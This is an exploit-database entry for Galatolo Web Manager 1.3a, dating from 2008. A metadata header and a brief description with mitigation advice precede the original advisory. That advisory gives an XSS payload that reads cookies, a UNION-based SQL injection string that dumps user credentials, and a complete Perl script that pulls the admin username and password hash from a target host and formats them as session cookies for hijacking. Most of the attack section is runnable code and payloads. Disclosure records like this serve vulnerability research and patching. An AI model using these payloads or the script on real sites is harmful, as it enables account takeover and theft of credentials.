Galatolo Web Manager 1.3a - exploit.company

vendor:

Galatolo Web Manager

by:

StAkeR

8.8

CVSS

HIGH

XSS and SQL Injection

79, 89

CWE

Product Name: Galatolo Web Manager

Affected Version From: 1.3a

Affected Version To: 1.3a

Patch Exists: YES

Related CWE: N/A

CPE: a:galatolo_web_manager:galatolo_web_manager:1.3a

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2008

Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability

Galatolo Web Manager (GWM) version 1.3a is vulnerable to XSS and Remote SQL Injection. An attacker can inject malicious code into the 'tag' parameter of the 'all.php' script and execute arbitrary JavaScript code in the browser of the victim. An attacker can also inject malicious SQL code into the 'id' parameter of the 'index.php' script of the 'users' plugin to gain access to the database of the application.

Mitigation:

Input validation should be used to prevent XSS and SQL injection attacks. The application should also be kept up to date with the latest security patches.

Source

Exploit-DB raw data:

--==+============================================================================+==--
--==+   Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability    +==--    
--==+============================================================================+==--

 [*] Discovered By: StAkeR ~ StAkeR@hotmail.it
 [+] Discovered On: 14 Jul 2008
 [+] Download: http://gwm.dev-area.org/view.php?id=8

 [*] Vulnerabilities:
 
 [*] XSS <= 1.3a
 [+] all.php?tag= [Code Javascript]
 [+] http://site.com/all.php?tag=<script>alert(document.cookie)</script>
 
 [*] SQL (plugin users) 1.3a
 [+] plugins/users/index.php?id= [Code SQL]
 [+] -1+union+select+null,concat(user,0x3a,pass),null,concat(user(),0x3a,database(),0x3a,version())+from+users+where+id=1--
 
 [*] Exploit:

 #!/usr/bin/perl 
 use strict;
 use LWP::UserAgent;

 my $host = shift;
 my ($start,$content,@login);
 my $evilxx = "/plugins/users/index.php?id=-1+union+select+1,concat(0x25,user,0x25,pass),null,null+from+users+where+id=1--";

 if($host =~ /^http:\/\/?/i)
 {
   $start = new LWP::UserAgent or die "[+] Unable to connect\n";
   $start->timeout(1);
   $start->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)");
   $content = $start->get($host.$evilxx);
  
   if($content->is_success)
   {
     if($content->content =~ /%(.+?)%([0-9a-f]{32})/)
     {
       push(@login,$1,$2);
       print "[+] Login:\n";
       print "[+] Username: $login[0]\n";
       print "[+] Password: $login[1]\n\n";
      
       print "[+] Cookie Session:\n";
       print "[+] gwm_user = $login[0]\n";
       print "[+] gwm_pass = $login[1]\n\n";
      
       print "[+] Crack Password:\n";
       print "[+] md5(md5(password)) for crack:\n"; 
       print "[+] http://passcracking.com\n";
     }
     else
     {
       print "[+] Exploit Failed\n";
       print "[+] Site Not Vulnerable\n";
     }
   }
 }
 else
 {
   print "[+] Galatolo Web Manager (plugin users) 1.3 Remote SQL Injection\n";
   print "[+] Exploit Coded By: StAkeR ~ StAkeR\@hotmail.it\n\n";
   print "[+] Usage: Perl $0 <host>\n";
   print "[+] Usage: Perl $0 http://site.com\n";
 }

# milw0rm.com [2008-07-15]